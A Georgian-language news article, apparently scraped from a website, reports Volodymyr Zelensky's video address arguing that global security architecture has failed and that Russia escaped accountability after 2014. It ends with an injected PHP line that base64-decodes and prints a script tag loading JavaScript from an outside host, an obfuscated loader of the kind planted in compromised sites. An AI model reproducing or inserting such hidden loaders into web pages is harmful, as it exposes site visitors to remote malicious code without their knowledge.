celsiusi
ავერსი საქკაბელი
ბოლო პერიოდში მსოფლიოს სხვადასხვა კუთხიდან მოსული ინფორმაცია კონფლიქტურ სიტუაციებთან დაკავშირებით, იქნება ეს ბალკანეთი, ტაივანი, თუ სამხრეთ კავკასია, ერთ რამეზე მეტყველებს, მიუხედავად იმისა, რომ ეს სიტუაციები ერთმანეთისგან განსხვავდება, მათ ერთი ფაქტორი აერთიანებს – უსაფრთხოების გლობალურმა არქიტექტურამ ვერ იმუშავა, – ამის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ ვიდეომიმართვაში განაცხადა.
 
მისი თქმით, ეს სწორედ ის არის, რაზეც უკრაინა ყურადღებას უკვე წლებია, ამახვილებს, მას შემდეგ რაც, რუსეთმა საერთაშორისო სამართლის ნორმები დაარღვია.
 
„2014 წელი გარდამტეხი მომენტი იყო. მაშინ სრულიად აშკარა ვითარებაში – ყირიმთან, დონბასთან, ჩამოგდებულ მალაიზიურ „ბოინგთან“, რუსეთმა თავი აარიდა დაუყოვნებლივ და ხელშესახებ პასუხისმგებლობას, შეინარჩუნა ბიზნეს-პოლიტიკური კავშირები სამყაროსთან. ახლა გლობალურ ურთიერთობებში მრავალს სჯერა, რომ ესეც გამოუვა. სწორედ ამიტომ, უკრაინელები ახლა აკეთებენ ძალიან მნიშვნელოვან საქმეს ყველასთვის მსოფლიოში. ჩვენმა ერმა გააერთიანა თავისუფალი სამყარო არამხოლოდ საკუთარი თავისუფლებისთვის ბრძოლაში, არამედ იმ გაგებით, თუ რამდენად მყიფეა ჩვენი თავისუფლება. ამ სიმყიფის დაცვა შესაძლებელია მხოლოდ ერთობლივი ქმედებებით და ამან რომ იმუშავოს ხანგრძლივ პერსპექტივაში, საჭიროა გლობალური უსაფრთხოების ეფექტური არქიტექტურა, რომელიც უზრუნველყოფს, რომ ვერც ერთმა სახელმწიფომ ვეღარასდროს მიმართოს სხვა სახელმწიფოს ტერორს“, -აცხადებს ზელენსკი.
474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");